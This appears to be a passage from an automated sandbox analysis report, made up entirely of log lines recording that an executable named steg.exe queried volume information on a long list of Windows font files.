                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
